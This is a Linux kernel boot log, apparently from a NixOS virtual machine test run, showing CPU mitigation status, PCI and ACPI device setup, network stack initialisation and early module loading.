machine # Aug 02 11:49:32 machine kernel: Spectre V2 : Spectre BHI mitigation: SW BHB clearing on vm exit
machine # Aug 02 11:49:32 machine kernel: Spectre V2 : Spectre BHI mitigation: SW BHB clearing on syscall
machine # Aug 02 11:49:32 machine kernel: Spectre V2 : Mitigation: Enhanced / Automatic IBRS
machine # Aug 02 11:49:32 machine kernel: Spectre V2 : Spectre v2 / SpectreRSB mitigation: Filling RSB on context switch
machine # Aug 02 11:49:32 machine kernel: Spectre V2 : Spectre v2 / PBRSB-eIBRS: Retire a single CALL on VMEXIT
machine # Aug 02 11:49:32 machine kernel: Spectre V2 : mitigation: Enabling conditional Indirect Branch Prediction Barrier
machine # Aug 02 11:49:32 machine kernel: Speculative Store Bypass: Mitigation: Speculative Store Bypass disabled via prctl
machine # Aug 02 11:49:32 machine kernel: Register File Data Sampling: Vulnerable: No microcode
machine # Aug 02 11:49:32 machine kernel: x86/fpu: Supporting XSAVE feature 0x001: 'x87 floating point registers'
machine # Aug 02 11:49:32 machine kernel: x86/fpu: Supporting XSAVE feature 0x002: 'SSE registers'
machine # Aug 02 11:49:32 machine kernel: x86/fpu: Supporting XSAVE feature 0x004: 'AVX registers'
machine # Aug 02 11:49:32 machine kernel: x86/fpu: Supporting XSAVE feature 0x200: 'Protection Keys User registers'
machine # Aug 02 11:49:32 machine kernel: x86/fpu: xstate_offset[2]: 576, xstate_sizes[2]: 256
machine # Aug 02 11:49:32 machine kernel: x86/fpu: xstate_offset[9]: 832, xstate_sizes[9]: 8
machine # Aug 02 11:49:32 machine kernel: x86/fpu: Enabled xstate features 0x207, context size is 840 bytes, using 'compacted' format.
machine # Aug 02 11:49:32 machine kernel: Freeing SMP alternatives memory: 36K
machine # Aug 02 11:49:32 machine kernel: pid_max: default: 32768 minimum: 301
machine # Aug 02 11:49:32 machine kernel: LSM: initializing lsm=capability,landlock,yama,selinux,bpf,integrity
machine # Aug 02 11:49:32 machine kernel: landlock: Up and running.
machine # Aug 02 11:49:32 machine kernel: Yama: becoming mindful.
machine # Aug 02 11:49:32 machine kernel: SELinux: Initializing.
machine # Aug 02 11:49:32 machine kernel: LSM support for eBPF active
machine # Aug 02 11:49:32 machine kernel: Mount-cache hash table entries: 8192 (order: 4, 65536 bytes, linear)
machine # Aug 02 11:49:32 machine kernel: Mountpoint-cache hash table entries: 8192 (order: 4, 65536 bytes, linear)
machine # Aug 02 11:49:32 machine kernel: smpboot: CPU0: 13th Gen Intel(R) Core(TM) i7-1355U (family: 0x6, model: 0xba, stepping: 0x3)
machine # Aug 02 11:49:32 machine kernel: RCU Tasks: Setting shift to 0 and lim to 1 rcu_task_cb_adjust=1.
machine # Aug 02 11:49:32 machine kernel: RCU Tasks Rude: Setting shift to 0 and lim to 1 rcu_task_cb_adjust=1.
machine # Aug 02 11:49:32 machine kernel: RCU Tasks Trace: Setting shift to 0 and lim to 1 rcu_task_cb_adjust=1.
machine # Aug 02 11:49:32 machine kernel: Performance Events: unsupported p6 CPU model 186 no PMU driver, software events only.
machine # Aug 02 11:49:32 machine kernel: signal: max sigframe size: 3632
machine # Aug 02 11:49:32 machine kernel: rcu: Hierarchical SRCU implementation.
machine # Aug 02 11:49:32 machine kernel: rcu: Max phase no-delay instances is 400.
machine # Aug 02 11:49:32 machine kernel: NMI watchdog: Perf NMI watchdog permanently disabled
machine # Aug 02 11:49:32 machine kernel: smp: Bringing up secondary CPUs ...
machine # Aug 02 11:49:32 machine kernel: smp: Brought up 1 node, 1 CPU
machine # Aug 02 11:49:32 machine kernel: smpboot: Max logical packages: 1
machine # Aug 02 11:49:32 machine kernel: smpboot: Total of 1 processors activated (5222.40 BogoMIPS)
machine # Aug 02 11:49:32 machine kernel: devtmpfs: initialized
machine # Aug 02 11:49:32 machine kernel: x86/mm: Memory block size: 128MB
machine # Aug 02 11:49:32 machine kernel: ACPI: PM: Registering ACPI NVS region [mem 0x00800000-0x00807fff] (32768 bytes)
machine # Aug 02 11:49:32 machine kernel: ACPI: PM: Registering ACPI NVS region [mem 0x0080b000-0x0080bfff] (4096 bytes)
machine # Aug 02 11:49:32 machine kernel: ACPI: PM: Registering ACPI NVS region [mem 0x00810000-0x008fffff] (983040 bytes)
machine # Aug 02 11:49:32 machine kernel: ACPI: PM: Registering ACPI NVS region [mem 0xbfb7f000-0xbfbfefff] (524288 bytes)
machine # Aug 02 11:49:32 machine kernel: ACPI: PM: Registering ACPI NVS region [mem 0xbff78000-0xbfffffff] (557056 bytes)
machine # Aug 02 11:49:32 machine kernel: clocksource: jiffies: mask: 0xffffffff max_cycles: 0xffffffff, max_idle_ns: 1911260446275000 ns
machine # Aug 02 11:49:32 machine kernel: futex hash table entries: 256 (order: 2, 16384 bytes, linear)
machine # Aug 02 11:49:32 machine kernel: pinctrl core: initialized pinctrl subsystem
machine # Aug 02 11:49:32 machine kernel: PM: RTC time: 11:49:14, date: 2024-08-02
machine # Aug 02 11:49:32 machine kernel: NET: Registered PF_NETLINK/PF_ROUTE protocol family
machine # Aug 02 11:49:32 machine kernel: DMA: preallocated 512 KiB GFP_KERNEL pool for atomic allocations
machine # Aug 02 11:49:32 machine kernel: DMA: preallocated 512 KiB GFP_KERNEL|GFP_DMA pool for atomic allocations
machine # Aug 02 11:49:32 machine kernel: DMA: preallocated 512 KiB GFP_KERNEL|GFP_DMA32 pool for atomic allocations
machine # Aug 02 11:49:32 machine kernel: audit: initializing netlink subsys (disabled)
machine # Aug 02 11:49:32 machine kernel: audit: type=2000 audit(1722599354.538:1): state=initialized audit_enabled=0 res=1
machine # Aug 02 11:49:32 machine kernel: thermal_sys: Registered thermal governor 'bang_bang'
machine # Aug 02 11:49:32 machine kernel: thermal_sys: Registered thermal governor 'step_wise'
machine # Aug 02 11:49:32 machine kernel: thermal_sys: Registered thermal governor 'user_space'
machine # Aug 02 11:49:32 machine kernel: cpuidle: using governor menu
machine # Aug 02 11:49:32 machine kernel: acpiphp: ACPI Hot Plug PCI Controller Driver version: 0.5
machine # Aug 02 11:49:32 machine kernel: PCI: Using configuration type 1 for base access
machine # Aug 02 11:49:32 machine kernel: kprobes: kprobe jump-optimization is enabled. All kprobes are optimized if possible.
machine # Aug 02 11:49:32 machine kernel: HugeTLB: registered 1.00 GiB page size, pre-allocated 0 pages
machine # Aug 02 11:49:32 machine kernel: HugeTLB: 16380 KiB vmemmap can be freed for a 1.00 GiB page
machine # Aug 02 11:49:32 machine kernel: HugeTLB: registered 2.00 MiB page size, pre-allocated 0 pages
machine # Aug 02 11:49:32 machine kernel: HugeTLB: 28 KiB vmemmap can be freed for a 2.00 MiB page
machine # Aug 02 11:49:32 machine kernel: fbcon: Taking over console
machine # Aug 02 11:49:32 machine kernel: ACPI: Added _OSI(Module Device)
machine # Aug 02 11:49:32 machine kernel: ACPI: Added _OSI(Processor Device)
machine # Aug 02 11:49:32 machine kernel: ACPI: Added _OSI(3.0 _SCP Extensions)
machine # Aug 02 11:49:32 machine kernel: ACPI: Added _OSI(Processor Aggregator Device)
machine # Aug 02 11:49:32 machine kernel: ACPI: 1 ACPI AML tables successfully acquired and loaded
machine # Aug 02 11:49:32 machine kernel: ACPI: _OSC evaluation for CPUs failed, trying _PDC
machine # Aug 02 11:49:32 machine kernel: ACPI: Interpreter enabled
machine # Aug 02 11:49:32 machine kernel: ACPI: PM: (supports S0 S3 S4 S5)
machine # Aug 02 11:49:32 machine kernel: ACPI: Using IOAPIC for interrupt routing
machine # Aug 02 11:49:32 machine kernel: PCI: Using host bridge windows from ACPI; if necessary, use "pci=nocrs" and report a bug
machine # Aug 02 11:49:32 machine kernel: PCI: Using E820 reservations for host bridge windows
machine # Aug 02 11:49:32 machine kernel: ACPI: Enabled 2 GPEs in block 00 to 0F
machine # Aug 02 11:49:32 machine kernel: ACPI: PCI Root Bridge [PCI0] (domain 0000 [bus 00-ff])
machine # Aug 02 11:49:32 machine kernel: acpi PNP0A03:00: _OSC: OS supports [ASPM ClockPM Segments MSI HPX-Type3]
machine # Aug 02 11:49:32 machine kernel: acpi PNP0A03:00: _OSC: not requesting OS control; OS requires [ExtendedConfig ASPM ClockPM MSI]
machine # Aug 02 11:49:32 machine kernel: acpi PNP0A03:00: fail to add MMCONFIG information, can't access extended configuration space under this bridge
machine # Aug 02 11:49:32 machine kernel: acpiphp: Slot [3] registered
machine # Aug 02 11:49:32 machine kernel: acpiphp: Slot [4] registered
machine # Aug 02 11:49:32 machine kernel: acpiphp: Slot [5] registered
machine # Aug 02 11:49:32 machine kernel: acpiphp: Slot [6] registered
machine # Aug 02 11:49:32 machine kernel: acpiphp: Slot [7] registered
machine # Aug 02 11:49:32 machine kernel: acpiphp: Slot [8] registered
machine # Aug 02 11:49:32 machine kernel: acpiphp: Slot [9] registered
machine # Aug 02 11:49:32 machine kernel: acpiphp: Slot [10] registered
machine # Aug 02 11:49:32 machine kernel: acpiphp: Slot [11] registered
machine # Aug 02 11:49:32 machine kernel: acpiphp: Slot [12] registered
machine # Aug 02 11:49:32 machine kernel: acpiphp: Slot [13] registered
machine # Aug 02 11:49:32 machine kernel: acpiphp: Slot [14] registered
machine # Aug 02 11:49:32 machine kernel: acpiphp: Slot [15] registered
machine # Aug 02 11:49:32 machine kernel: acpiphp: Slot [16] registered
machine # Aug 02 11:49:32 machine kernel: acpiphp: Slot [17] registered
machine # Aug 02 11:49:32 machine kernel: acpiphp: Slot [18] registered
machine # Aug 02 11:49:32 machine kernel: acpiphp: Slot [19] registered
machine # Aug 02 11:49:32 machine kernel: acpiphp: Slot [20] registered
machine # Aug 02 11:49:32 machine kernel: acpiphp: Slot [21] registered
machine # Aug 02 11:49:32 machine kernel: acpiphp: Slot [22] registered
machine # Aug 02 11:49:32 machine kernel: acpiphp: Slot [23] registered
machine # Aug 02 11:49:32 machine kernel: acpiphp: Slot [24] registered
machine # Aug 02 11:49:32 machine kernel: acpiphp: Slot [25] registered
machine # Aug 02 11:49:32 machine kernel: acpiphp: Slot [26] registered
machine # Aug 02 11:49:32 machine kernel: acpiphp: Slot [27] registered
machine # Aug 02 11:49:32 machine kernel: acpiphp: Slot [28] registered
machine # Aug 02 11:49:32 machine kernel: acpiphp: Slot [29] registered
machine # Aug 02 11:49:32 machine kernel: acpiphp: Slot [30] registered
machine # Aug 02 11:49:32 machine kernel: acpiphp: Slot [31] registered
machine # Aug 02 11:49:32 machine kernel: PCI host bridge to bus 0000:00
machine # Aug 02 11:49:32 machine kernel: pci_bus 0000:00: root bus resource [io 0x0000-0x0cf7 window]
machine # Aug 02 11:49:32 machine kernel: pci_bus 0000:00: root bus resource [io 0x0d00-0xffff window]
machine # Aug 02 11:49:32 machine kernel: pci_bus 0000:00: root bus resource [mem 0x000a0000-0x000bffff window]
machine # Aug 02 11:49:32 machine kernel: pci_bus 0000:00: root bus resource [mem 0xc0000000-0xfebfffff window]
machine # Aug 02 11:49:32 machine kernel: pci_bus 0000:00: root bus resource [mem 0x7000000000-0x707fffffff window]
machine # Aug 02 11:49:32 machine kernel: pci_bus 0000:00: root bus resource [bus 00-ff]
machine # Aug 02 11:49:32 machine kernel: pci 0000:00:00.0: [8086:1237] type 00 class 0x060000
machine # Aug 02 11:49:32 machine kernel: pci 0000:00:01.0: [8086:7000] type 00 class 0x060100
machine # Aug 02 11:49:32 machine kernel: pci 0000:00:01.1: [8086:7010] type 00 class 0x010180
machine # Aug 02 11:49:32 machine kernel: pci 0000:00:01.1: reg 0x20: [io 0xc2e0-0xc2ef]
machine # Aug 02 11:49:32 machine kernel: pci 0000:00:01.1: legacy IDE quirk: reg 0x10: [io 0x01f0-0x01f7]
machine # Aug 02 11:49:32 machine kernel: pci 0000:00:01.1: legacy IDE quirk: reg 0x14: [io 0x03f6]
machine # Aug 02 11:49:32 machine kernel: pci 0000:00:01.1: legacy IDE quirk: reg 0x18: [io 0x0170-0x0177]
machine # Aug 02 11:49:32 machine kernel: pci 0000:00:01.1: legacy IDE quirk: reg 0x1c: [io 0x0376]
machine # Aug 02 11:49:32 machine kernel: pci 0000:00:01.2: [8086:7020] type 00 class 0x0c0300
machine # Aug 02 11:49:32 machine kernel: pci 0000:00:01.2: reg 0x20: [io 0xc2c0-0xc2df]
machine # Aug 02 11:49:32 machine kernel: pci 0000:00:01.3: [8086:7113] type 00 class 0x068000
machine # Aug 02 11:49:32 machine kernel: pci 0000:00:01.3: quirk: [io 0xb000-0xb03f] claimed by PIIX4 ACPI
machine # Aug 02 11:49:32 machine kernel: pci 0000:00:01.3: quirk: [io 0xb100-0xb10f] claimed by PIIX4 SMB
machine # Aug 02 11:49:32 machine kernel: pci 0000:00:02.0: [1234:1111] type 00 class 0x030000
machine # Aug 02 11:49:32 machine kernel: pci 0000:00:02.0: reg 0x10: [mem 0xc0000000-0xc0ffffff pref]
machine # Aug 02 11:49:32 machine kernel: pci 0000:00:02.0: reg 0x18: [mem 0xc104c000-0xc104cfff]
machine # Aug 02 11:49:32 machine kernel: pci 0000:00:02.0: reg 0x30: [mem 0xffff0000-0xffffffff pref]
machine # Aug 02 11:49:32 machine kernel: pci 0000:00:02.0: BAR 0: assigned to efifb
machine # Aug 02 11:49:32 machine kernel: pci 0000:00:02.0: Video device with shadowed ROM at [mem 0x000c0000-0x000dffff]
machine # Aug 02 11:49:32 machine kernel: pci 0000:00:03.0: [1af4:1000] type 00 class 0x020000
machine # Aug 02 11:49:32 machine kernel: pci 0000:00:03.0: reg 0x10: [io 0xc2a0-0xc2bf]
machine # Aug 02 11:49:32 machine kernel: pci 0000:00:03.0: reg 0x14: [mem 0xc104b000-0xc104bfff]
machine # Aug 02 11:49:32 machine kernel: pci 0000:00:03.0: reg 0x20: [mem 0x7000000000-0x7000003fff 64bit pref]
machine # Aug 02 11:49:32 machine kernel: pci 0000:00:03.0: reg 0x30: [mem 0xfffc0000-0xffffffff pref]
machine # Aug 02 11:49:32 machine kernel: pci 0000:00:04.0: [1af4:1005] type 00 class 0x00ff00
machine # Aug 02 11:49:32 machine kernel: pci 0000:00:04.0: reg 0x10: [io 0xc280-0xc29f]
machine # Aug 02 11:49:32 machine kernel: pci 0000:00:04.0: reg 0x14: [mem 0xc104a000-0xc104afff]
machine # Aug 02 11:49:32 machine kernel: pci 0000:00:04.0: reg 0x20: [mem 0x7000004000-0x7000007fff 64bit pref]
machine # Aug 02 11:49:32 machine kernel: pci 0000:00:05.0: [1af4:1009] type 00 class 0x000200
machine # Aug 02 11:49:32 machine kernel: pci 0000:00:05.0: reg 0x10: [io 0xc1c0-0xc1ff]
machine # Aug 02 11:49:32 machine kernel: pci 0000:00:05.0: reg 0x14: [mem 0xc1049000-0xc1049fff]
machine # Aug 02 11:49:32 machine kernel: pci 0000:00:05.0: reg 0x20: [mem 0x7000008000-0x700000bfff 64bit pref]
machine # Aug 02 11:49:32 machine kernel: pci 0000:00:06.0: [1af4:1009] type 00 class 0x000200
machine # Aug 02 11:49:32 machine kernel: pci 0000:00:06.0: reg 0x10: [io 0xc260-0xc27f]
machine # Aug 02 11:49:32 machine kernel: pci 0000:00:06.0: reg 0x14: [mem 0xc1048000-0xc1048fff]
machine # Aug 02 11:49:32 machine kernel: pci 0000:00:06.0: reg 0x20: [mem 0x700000c000-0x700000ffff 64bit pref]
machine # Aug 02 11:49:32 machine kernel: pci 0000:00:07.0: [1af4:1009] type 00 class 0x000200
machine # Aug 02 11:49:32 machine kernel: pci 0000:00:07.0: reg 0x10: [io 0xc240-0xc25f]
machine # Aug 02 11:49:32 machine kernel: pci 0000:00:07.0: reg 0x14: [mem 0xc1047000-0xc1047fff]
machine # Aug 02 11:49:32 machine kernel: pci 0000:00:07.0: reg 0x20: [mem 0x7000010000-0x7000013fff 64bit pref]
machine # Aug 02 11:49:32 machine kernel: pci 0000:00:08.0: [1af4:1001] type 00 class 0x010000
machine # Aug 02 11:49:32 machine kernel: pci 0000:00:08.0: reg 0x10: [io 0xc100-0xc17f]
machine # Aug 02 11:49:32 machine kernel: pci 0000:00:08.0: reg 0x14: [mem 0xc1046000-0xc1046fff]
machine # Aug 02 11:49:32 machine kernel: pci 0000:00:08.0: reg 0x20: [mem 0x7000014000-0x7000017fff 64bit pref]
machine # Aug 02 11:49:32 machine kernel: pci 0000:00:09.0: [1af4:1001] type 00 class 0x010000
machine # Aug 02 11:49:32 machine kernel: pci 0000:00:09.0: reg 0x10: [io 0xc080-0xc0ff]
machine # Aug 02 11:49:32 machine kernel: pci 0000:00:09.0: reg 0x14: [mem 0xc1045000-0xc1045fff]
machine # Aug 02 11:49:32 machine kernel: pci 0000:00:09.0: reg 0x20: [mem 0x7000018000-0x700001bfff 64bit pref]
machine # Aug 02 11:49:32 machine kernel: pci 0000:00:0a.0: [1af4:1001] type 00 class 0x010000
machine # Aug 02 11:49:32 machine kernel: pci 0000:00:0a.0: reg 0x10: [io 0xc000-0xc07f]
machine # Aug 02 11:49:32 machine kernel: pci 0000:00:0a.0: reg 0x14: [mem 0xc1044000-0xc1044fff]
machine # Aug 02 11:49:32 machine kernel: pci 0000:00:0a.0: reg 0x20: [mem 0x700001c000-0x700001ffff 64bit pref]
machine # Aug 02 11:49:32 machine kernel: pci 0000:00:0b.0: [1af4:1000] type 00 class 0x020000
machine # Aug 02 11:49:32 machine kernel: pci 0000:00:0b.0: reg 0x10: [io 0xc220-0xc23f]
machine # Aug 02 11:49:32 machine kernel: pci 0000:00:0b.0: reg 0x14: [mem 0xc1043000-0xc1043fff]
machine # Aug 02 11:49:32 machine kernel: pci 0000:00:0b.0: reg 0x20: [mem 0x7000020000-0x7000023fff 64bit pref]
machine # Aug 02 11:49:32 machine kernel: pci 0000:00:0b.0: reg 0x30: [mem 0xfffc0000-0xffffffff pref]
machine # Aug 02 11:49:32 machine kernel: pci 0000:00:0c.0: [1af4:1052] type 00 class 0x090000
machine # Aug 02 11:49:32 machine kernel: pci 0000:00:0c.0: reg 0x14: [mem 0xc1042000-0xc1042fff]
machine # Aug 02 11:49:32 machine kernel: pci 0000:00:0c.0: reg 0x20: [mem 0x7000024000-0x7000027fff 64bit pref]
machine # Aug 02 11:49:32 machine kernel: pci 0000:00:0d.0: [1af4:1003] type 00 class 0x078000
machine # Aug 02 11:49:32 machine kernel: pci 0000:00:0d.0: reg 0x10: [io 0xc180-0xc1bf]
machine # Aug 02 11:49:32 machine kernel: pci 0000:00:0d.0: reg 0x14: [mem 0xc1041000-0xc1041fff]
machine # Aug 02 11:49:32 machine kernel: pci 0000:00:0d.0: reg 0x20: [mem 0x7000028000-0x700002bfff 64bit pref]
machine # Aug 02 11:49:32 machine kernel: pci 0000:00:0e.0: [1af4:1005] type 00 class 0x00ff00
machine # Aug 02 11:49:32 machine kernel: pci 0000:00:0e.0: reg 0x10: [io 0xc200-0xc21f]
machine # Aug 02 11:49:32 machine kernel: pci 0000:00:0e.0: reg 0x14: [mem 0xc1040000-0xc1040fff]
machine # Aug 02 11:49:32 machine kernel: pci 0000:00:0e.0: reg 0x20: [mem 0x700002c000-0x700002ffff 64bit pref]
machine # Aug 02 11:49:32 machine kernel: ACPI: PCI: Interrupt link LNKA configured for IRQ 10
machine # Aug 02 11:49:32 machine kernel: ACPI: PCI: Interrupt link LNKB configured for IRQ 10
machine # Aug 02 11:49:32 machine kernel: ACPI: PCI: Interrupt link LNKC configured for IRQ 11
machine # Aug 02 11:49:32 machine kernel: ACPI: PCI: Interrupt link LNKD configured for IRQ 11
machine # Aug 02 11:49:32 machine kernel: ACPI: PCI: Interrupt link LNKS configured for IRQ 9
machine # Aug 02 11:49:32 machine kernel: iommu: Default domain type: Translated
machine # Aug 02 11:49:32 machine kernel: iommu: DMA domain TLB invalidation policy: lazy mode
machine # Aug 02 11:49:32 machine kernel: ACPI: bus type USB registered
machine # Aug 02 11:49:32 machine kernel: usbcore: registered new interface driver usbfs
machine # Aug 02 11:49:32 machine kernel: usbcore: registered new interface driver hub
machine # Aug 02 11:49:32 machine kernel: usbcore: registered new device driver usb
machine # Aug 02 11:49:32 machine kernel: efivars: Registered efivars operations
machine # Aug 02 11:49:32 machine kernel: NetLabel: Initializing
machine # Aug 02 11:49:32 machine kernel: NetLabel: domain hash size = 128
machine # Aug 02 11:49:32 machine kernel: NetLabel: protocols = UNLABELED CIPSOv4 CALIPSO
machine # Aug 02 11:49:32 machine kernel: NetLabel: unlabeled traffic allowed by default
machine # Aug 02 11:49:32 machine kernel: PCI: Using ACPI for IRQ routing
machine # Aug 02 11:49:32 machine kernel: PCI: pci_cache_line_size set to 64 bytes
machine # Aug 02 11:49:32 machine kernel: e820: reserve RAM buffer [mem 0x0080b000-0x008fffff]
machine # Aug 02 11:49:32 machine kernel: e820: reserve RAM buffer [mem 0x00810000-0x008fffff]
machine # Aug 02 11:49:32 machine kernel: e820: reserve RAM buffer [mem 0xbda18018-0xbfffffff]
machine # Aug 02 11:49:32 machine kernel: e820: reserve RAM buffer [mem 0xbda40018-0xbfffffff]
machine # Aug 02 11:49:32 machine kernel: e820: reserve RAM buffer [mem 0xbda68018-0xbfffffff]
machine # Aug 02 11:49:32 machine kernel: e820: reserve RAM buffer [mem 0xbe63c000-0xbfffffff]
machine # Aug 02 11:49:32 machine kernel: e820: reserve RAM buffer [mem 0xbf8ed000-0xbfffffff]
machine # Aug 02 11:49:32 machine kernel: e820: reserve RAM buffer [mem 0xbfef4000-0xbfffffff]
machine # Aug 02 11:49:32 machine kernel: pci 0000:00:02.0: vgaarb: setting as boot VGA device
machine # Aug 02 11:49:32 machine kernel: pci 0000:00:02.0: vgaarb: bridge control possible
machine # Aug 02 11:49:32 machine kernel: pci 0000:00:02.0: vgaarb: VGA device added: decodes=io+mem,owns=io+mem,locks=none
machine # Aug 02 11:49:32 machine kernel: vgaarb: loaded
machine # Aug 02 11:49:32 machine kernel: hpet0: at MMIO 0xfed00000, IRQs 2, 8, 0
machine # Aug 02 11:49:32 machine kernel: hpet0: 3 comparators, 64-bit 100.000000 MHz counter
machine # Aug 02 11:49:32 machine kernel: clocksource: Switched to clocksource kvm-clock
machine # Aug 02 11:49:32 machine kernel: VFS: Disk quotas dquot_6.6.0
machine # Aug 02 11:49:32 machine kernel: VFS: Dquot-cache hash table entries: 512 (order 0, 4096 bytes)
machine # Aug 02 11:49:32 machine kernel: pnp: PnP ACPI init
machine # Aug 02 11:49:32 machine kernel: pnp 00:02: [dma 2]
machine # Aug 02 11:49:32 machine kernel: pnp: PnP ACPI: found 6 devices
machine # Aug 02 11:49:32 machine kernel: clocksource: acpi_pm: mask: 0xffffff max_cycles: 0xffffff, max_idle_ns: 2085701024 ns
machine # Aug 02 11:49:32 machine kernel: NET: Registered PF_INET protocol family
machine # Aug 02 11:49:32 machine kernel: IP idents hash table entries: 65536 (order: 7, 524288 bytes, linear)
machine # Aug 02 11:49:32 machine kernel: tcp_listen_portaddr_hash hash table entries: 2048 (order: 3, 32768 bytes, linear)
machine # Aug 02 11:49:32 machine kernel: Table-perturb hash table entries: 65536 (order: 6, 262144 bytes, linear)
machine # Aug 02 11:49:32 machine kernel: TCP established hash table entries: 32768 (order: 6, 262144 bytes, linear)
machine # Aug 02 11:49:32 machine kernel: TCP bind hash table entries: 32768 (order: 8, 1048576 bytes, linear)
machine # Aug 02 11:49:32 machine kernel: TCP: Hash tables configured (established 32768 bind 32768)
machine # Aug 02 11:49:32 machine kernel: MPTCP token hash table entries: 4096 (order: 4, 98304 bytes, linear)
machine # Aug 02 11:49:32 machine kernel: UDP hash table entries: 2048 (order: 4, 65536 bytes, linear)
machine # Aug 02 11:49:32 machine kernel: UDP-Lite hash table entries: 2048 (order: 4, 65536 bytes, linear)
machine # Aug 02 11:49:32 machine kernel: NET: Registered PF_UNIX/PF_LOCAL protocol family
machine # Aug 02 11:49:32 machine kernel: NET: Registered PF_XDP protocol family
machine # Aug 02 11:49:32 machine kernel: pci 0000:00:03.0: can't claim BAR 6 [mem 0xfffc0000-0xffffffff pref]: no compatible bridge window
machine # Aug 02 11:49:32 machine kernel: pci 0000:00:0b.0: can't claim BAR 6 [mem 0xfffc0000-0xffffffff pref]: no compatible bridge window
machine # Aug 02 11:49:32 machine kernel: pci 0000:00:03.0: BAR 6: assigned [mem 0xc1000000-0xc103ffff pref]
machine # Aug 02 11:49:32 machine kernel: pci 0000:00:0b.0: BAR 6: assigned [mem 0xc1080000-0xc10bffff pref]
machine # Aug 02 11:49:32 machine kernel: pci_bus 0000:00: resource 4 [io 0x0000-0x0cf7 window]
machine # Aug 02 11:49:32 machine kernel: pci_bus 0000:00: resource 5 [io 0x0d00-0xffff window]
machine # Aug 02 11:49:32 machine kernel: pci_bus 0000:00: resource 6 [mem 0x000a0000-0x000bffff window]
machine # Aug 02 11:49:32 machine kernel: pci_bus 0000:00: resource 7 [mem 0xc0000000-0xfebfffff window]
machine # Aug 02 11:49:32 machine kernel: pci_bus 0000:00: resource 8 [mem 0x7000000000-0x707fffffff window]
machine # Aug 02 11:49:32 machine kernel: pci 0000:00:01.0: PIIX3: Enabling Passive Release
machine # Aug 02 11:49:32 machine kernel: pci 0000:00:00.0: Limiting direct PCI/PCI transfers
machine # Aug 02 11:49:32 machine kernel: ACPI: \_SB_.LNKD: Enabled at IRQ 11
machine # Aug 02 11:49:32 machine kernel: pci 0000:00:01.2: quirk_usb_early_handoff+0x0/0x7d0 took 19864 usecs
machine # Aug 02 11:49:32 machine kernel: PCI: CLS 0 bytes, default 64
machine # Aug 02 11:49:32 machine kernel: Trying to unpack rootfs image as initramfs...
machine # Aug 02 11:49:32 machine kernel: PCI-DMA: Using software bounce buffering for IO (SWIOTLB)
machine # Aug 02 11:49:32 machine kernel: software IO TLB: mapped [mem 0x00000000b73cf000-0x00000000bb3cf000] (64MB)
machine # Aug 02 11:49:32 machine kernel: clocksource: tsc: mask: 0xffffffffffffffff max_cycles: 0x25a39079a08, max_idle_ns: 440795310461 ns
machine # Aug 02 11:49:32 machine kernel: Initialise system trusted keyrings
machine # Aug 02 11:49:32 machine kernel: workingset: timestamp_bits=40 max_order=20 bucket_order=0
machine # Aug 02 11:49:32 machine kernel: zbud: loaded
machine # Aug 02 11:49:32 machine kernel: Key type asymmetric registered
machine # Aug 02 11:49:32 machine kernel: Asymmetric key parser 'x509' registered
machine # Aug 02 11:49:32 machine kernel: Block layer SCSI generic (bsg) driver version 0.4 loaded (major 251)
machine # Aug 02 11:49:32 machine kernel: io scheduler mq-deadline registered
machine # Aug 02 11:49:32 machine kernel: io scheduler kyber registered
machine # Aug 02 11:49:32 machine kernel: Serial: 8250/16550 driver, 4 ports, IRQ sharing enabled
machine # Aug 02 11:49:32 machine kernel: 00:04: ttyS0 at I/O 0x3f8 (irq = 4, base_baud = 115200) is a 16550A
machine # Aug 02 11:49:32 machine kernel: Linux agpgart interface v0.103
machine # Aug 02 11:49:32 machine kernel: ACPI: bus type drm_connector registered
machine # Aug 02 11:49:32 machine kernel: usbcore: registered new interface driver usbserial_generic
machine # Aug 02 11:49:32 machine kernel: usbserial: USB Serial support registered for generic
machine # Aug 02 11:49:32 machine kernel: intel_pstate: CPU model not supported
machine # Aug 02 11:49:32 machine kernel: [drm] Initialized simpledrm 1.0.0 20200625 for simple-framebuffer.0 on minor 0
machine # Aug 02 11:49:32 machine kernel: Console: switching to colour frame buffer device 160x50
machine # Aug 02 11:49:32 machine kernel: simple-framebuffer simple-framebuffer.0: [drm] fb0: simpledrmdrmfb frame buffer device
machine # Aug 02 11:49:32 machine kernel: drop_monitor: Initializing network drop monitor service
machine # Aug 02 11:49:32 machine kernel: NET: Registered PF_INET6 protocol family
machine # Aug 02 11:49:32 machine kernel: Freeing initrd memory: 11932K
machine # Aug 02 11:49:32 machine kernel: Segment Routing with IPv6
machine # Aug 02 11:49:32 machine kernel: In-situ OAM (IOAM) with IPv6
machine # Aug 02 11:49:32 machine kernel: IPI shorthand broadcast: enabled
machine # Aug 02 11:49:32 machine kernel: sched_clock: Marking stable (549002404, 1583918)->(579559493, -28973171)
machine # Aug 02 11:49:32 machine kernel: registered taskstats version 1
machine # Aug 02 11:49:32 machine kernel: Loading compiled-in X.509 certificates
machine # Aug 02 11:49:32 machine kernel: Key type .fscrypt registered
machine # Aug 02 11:49:32 machine kernel: Key type fscrypt-provisioning registered
machine # Aug 02 11:49:32 machine kernel: PM: Magic number: 4:116:832
machine # Aug 02 11:49:32 machine kernel: RAS: Correctable Errors collector initialized.
machine # Aug 02 11:49:32 machine kernel: clk: Disabling unused clocks
machine # Aug 02 11:49:32 machine kernel: Freeing unused decrypted memory: 2028K
machine # Aug 02 11:49:32 machine kernel: Freeing unused kernel image (initmem) memory: 3116K
machine # Aug 02 11:49:32 machine kernel: Write protecting the kernel read-only data: 28672k
machine # Aug 02 11:49:32 machine kernel: Freeing unused kernel image (rodata/data gap) memory: 1448K
machine # Aug 02 11:49:32 machine kernel: x86/mm: Checked W+X mappings: passed, no W+X pages found.
machine # Aug 02 11:49:32 machine kernel: Run /init as init process
machine # Aug 02 11:49:32 machine kernel: with arguments:
machine # Aug 02 11:49:32 machine kernel: /init
machine # Aug 02 11:49:32 machine kernel: with environment:
machine # Aug 02 11:49:32 machine kernel: HOME=/
machine # Aug 02 11:49:32 machine kernel: TERM=linux
machine # Aug 02 11:49:32 machine stage-1-init: [Fri Aug 2 11:49:14 UTC 2024] loading module virtio_balloon...
machine # Aug 02 11:49:32 machine stage-1-init: [Fri Aug 2 11:49:14 UTC 2024] loading module virtio_console...
machine # Aug 02 11:49:32 machine stage-1-init: [Fri Aug 2 11:49:14 UTC 2024] loading module virtio_rng...
machine # Aug 02 11:49:32 machine stage-1-init: [Fri Aug 2 11:49:14 UTC 2024] loading module virtio_gpu...
machine # Aug 02 11:49:32 machine stage-1-init: [Fri Aug 2 11:49:14 UTC 2024] loading module dm_mod...
